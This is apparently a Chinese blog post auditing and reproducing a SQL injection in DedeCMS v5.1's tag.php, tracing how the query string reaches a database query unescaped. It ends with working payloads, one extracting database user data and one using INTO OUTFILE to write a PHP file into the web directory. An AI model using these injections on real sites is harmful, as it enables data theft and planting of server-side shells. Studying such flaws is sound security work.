标签:where base var field lob for index 审计 phpstudy
阅读书籍:《黑客脚本全本》、第240页、关于dedecms v5.1 tag.php 注入漏洞复现问题。
书中作者这个漏洞复现有些不正确、
#0x01
文件/tag.php
if(isset($_SERVER["QUERY_STRING"])){ $tag = trim($_SERVER["QUERY_STRING"]); //query_string (查询字符串),如果有的话,通过进行页面访问。 $tags = explode(‘/‘,$tag); // 通过‘/‘来分隔数据成数组 $tag = $tags[1]; //输出$tags数组第1个等于$tag if(count($tags)>3) $PageNo = intval($tags[2]); }else{ $tag = ""; } $tag = urldecode($tag); //$tag 进行一次url解码。 //如果没有Tag或Tag不合法,显示所有Tag if($tag=="" || $tag!=addslashes($tag) ){ $dlist = new TagList($tag,‘tag.htm‘); } //如果有Tag,显示文档列表 else{ $dlist = new TagList($tag,‘taglist.htm‘); } $dlist->Display();
跟进TagList函数:
function TagList($keyword,$templet){ $this->__construct($keyword,$templet); }
跟进__construct 构造函数:
function __construct($keyword,$templet) { $this->Templet = $templet; $this->Tag = $keyword; $this->dsql = new DedeSql(false); $this->dtp = new DedeTagParse(); $this->dtp->SetNameSpace("dede","{","}"); $this->dtp2 = new DedeTagParse(); $this->dtp2->SetNameSpace("field","[","]"); $this->TypeLink = new TypeLink(0); $this->Fields[‘tag‘] = $keyword; $this->Fields[‘position‘] = " ".$keyword; $this->Fields[‘title‘] = " 标签:{$keyword} "; $this->TempletsFile = ‘‘; //设置一些全局参数的值 foreach($GLOBALS[‘PubFields‘] as $k=>$v) $this->Fields[$k] = $v; $this->PartView = new PartView(0); //读取Tag信息 if($this->Tag!=‘‘) { $this->TagInfos = $this->dsql->GetOne("Select * From `#@__tag_index` where tagname like ‘{$this->Tag}‘ "); if(!is_array($this->TagInfos)) { $fullsearch = $GLOBALS[‘cfg_phpurl‘]."/search.php?keyword=".$this->Tag."&searchtype=titlekeyword"; $msg = "系统无此标签,可能已经移除!<br /><br />你还可以尝试通过搜索程序去搜索这个关键字:<a href=‘$fullsearch‘>前往搜索>></a>"; ShowMsgWin($msg,"<a href=‘tag.php‘>Tag标签</a> >> 错误提示"); $this->dsql->Close(); exit(); } $this->TagID = $this->TagInfos[‘id‘]; } //初始化模板 $tempfile = $GLOBALS[‘cfg_basedir‘].$GLOBALS[‘cfg_templets_dir‘]."/".$GLOBALS[‘cfg_df_style‘].‘/‘.$this->Templet; if(!file_exists($tempfile)||!is_file($tempfile)){ echo "模板文件:‘".$tempfile."‘ 不存在,无法解析文档!"; exit(); } $this->dtp->LoadTemplate($tempfile); $this->TempletsFile = ereg_replace("^".$GLOBALS[‘cfg_basedir‘],‘‘,$tempfile); }
$tag过程:
$tag -> $keyword -> GetOne("Select * From `#@__tag_index` where tagname like ‘{$this->Tag}‘ ")
经过一次urldecode解码以后直接带入数据库查询。
#0x02
书中提示思路、url二次编码绕过GPC限制,根据本地验证:
$tag = trim($_SERVER[‘QUERY_STRING‘]); //$tag = trim($_GET[‘tag‘]); echo $tag . ‘<br />‘; $tags = explode(‘/‘, $tag); //var_dump($tags); $tag = $tags[‘1‘]; echo $tag . ‘<br />‘; echo urldecode($tag);
书中给出的方法使用多个环境复现都是如此、不知是个人环境和配置问题还是:
url二次转义%27 带入数据库中直接被‘‘闭合在其中未正常的注入。
根据前辈们的其他相关信息获得如下解释:
$_SERVER 不受到GPC影响,所以无需利用二次编码。
直接单引号->浏览器自动会做一次url转码->然后再通过程序自带的urldecode解码。
#0x03
构造payload:
tag.php?tag=1/TommieTommie‘ union select 1,user(),3,4,5,6,7,8,9 from mysql.user %23/1/1
备份写shell:
tag.php?tag=1/1waaa2‘ union select 1,2,0x3C003F00700068007000200070006800700069006E0066006F00280029003B003F003E00,4,5,6,7,8,9 into outfile ‘C:%2FphpStudy%2FWWW%2Fdedecmsv51-utf8%2Fupload%2F1.php‘ %23/1/1
标签:where base var field lob for index 审计 phpstudy
原文地址:https://www.cnblogs.com/xsr7yer/p/9334658.html